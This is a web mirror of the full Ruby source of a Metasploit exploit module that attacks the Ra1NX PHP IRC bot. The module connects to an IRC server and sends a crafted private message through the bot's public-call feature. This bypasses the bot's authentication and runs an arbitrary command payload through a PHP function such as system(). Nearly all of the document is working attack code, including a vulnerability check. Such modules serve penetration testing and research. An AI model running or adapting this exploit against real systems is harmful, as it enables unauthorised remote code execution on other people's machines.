Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb
32533 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution',

16
        'Description' => %q{

17
          This module allows remote command execution on the PHP IRC bot Ra1NX by

18
          using the public call feature in private message to covertly bypass the

19
          authentication system.

20
        },

21
        'Author' => [

22
          'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module

23
        ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          ['OSVDB', '91663'],

27
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],

28
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],

29
          ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']

30
        ],

31
        'Arch' => ARCH_CMD,

32
        'Payload' => {

33
          'Space' => 344,

34
          'BadChars' => '',

35
          'DisableNops' => true,

36
          'Compat' =>

37
                        {

38
                          'PayloadType' => 'cmd'

39
                        }

40
        },

41
        'Targets' => [

42
          ['Ra1NX / Unix', { 'Platform' => 'unix' } ],

43
          ['Ra1NX / Windows', { 'Platform' => 'win' } ]

44
        ],

45
        'Privileged' => false,

46
        'DisclosureDate' => '2013-03-24',

47
        'DefaultTarget' => 0,

48
        'Notes' => {

49
          'Reliability' => UNKNOWN_RELIABILITY,

50
          'Stability' => UNKNOWN_STABILITY,

51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

52
        }

53
      )

54
    )

55


56
    register_options(

57
      [

58
        Opt::RPORT(6667),

59
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),

60
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),

61
        OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),

62
        OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])

63
      ]

64
    )

65
  end

66


67
  def post_auth?

68
    true

69
  end

70


71
  def connect_irc

72
    print_status("#{rhost}:#{rport} - Connecting to IRC server...")

73
    connect

74


75
    data = ''

76
    begin

77
      read_data = sock.get_once(-1, 1)

78
      until read_data.nil?

79
        data << read_data

80
        read_data = sock.get_once(-1, 1)

81
      end

82
    rescue EOFError

83
    end

84


85
    if data and data =~ /020.*wait/

86
      print_good("#{rhost}:#{rport} - Connection successful, giving 3 seconds to IRC server to process our connection...")

87
      select(nil, nil, nil, 3)

88
    end

89
  end

90


91
  def check

92
    connect_irc

93


94
    response = register(sock)

95
    if response =~ /463/ or response =~ /464/

96
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

97
      return Exploit::CheckCode::Unknown

98
    end

99


100
    confirm_string = rand_text_alpha(8)

101
    response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")

102


103
    quit(sock)

104
    disconnect

105


106
    if response =~ /#{confirm_string}/

107
      return Exploit::CheckCode::Vulnerable

108
    else

109
      return Exploit::CheckCode::Safe

110
    end

111
  end

112


113
  def send_msg(sock, data)

114
    sock.put(data)

115
    data = ''

116
    begin

117
      read_data = sock.get_once(-1, 1)

118
      until read_data.nil?

119
        data << read_data

120
        read_data = sock.get_once(-1, 1)

121
      end

122
    rescue EOFError

123
    end

124
    data

125
  end

126


127
  def register(sock)

128
    msg = ''

129


130
    if datastore['IRC_PASSWORD'] and !datastore['IRC_PASSWORD'].empty?

131
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"

132
    end

133


134
    if datastore['NICK'].length > 9

135
      nick = rand_text_alpha(9)

136
      print_error("The nick is longer than 9 characters, using #{nick}")

137
    else

138
      nick = datastore['NICK']

139
    end

140


141
    msg << "NICK #{nick}\r\n"

142
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

143


144
    response = send_msg(sock, msg)

145
    return response

146
  end

147


148
  def ra1nx_command(sock)

149
    encoded = payload.encoded

150
    command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n"

151
    response = send_msg(sock, command_msg)

152
    return response

153
  end

154


155
  def quit(sock)

156
    quit_msg = "QUIT :bye bye\r\n"

157
    sock.put(quit_msg)

158
  end

159


160
  def exploit

161
    connect_irc

162


163
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")

164
    response = register(sock)

165
    if response =~ /463/ or response =~ /464/

166
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

167
      return

168
    end

169


170
    print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")

171
    ra1nx_command(sock)

172


173
    quit(sock)

174
    disconnect

175
  end

176
end

177


178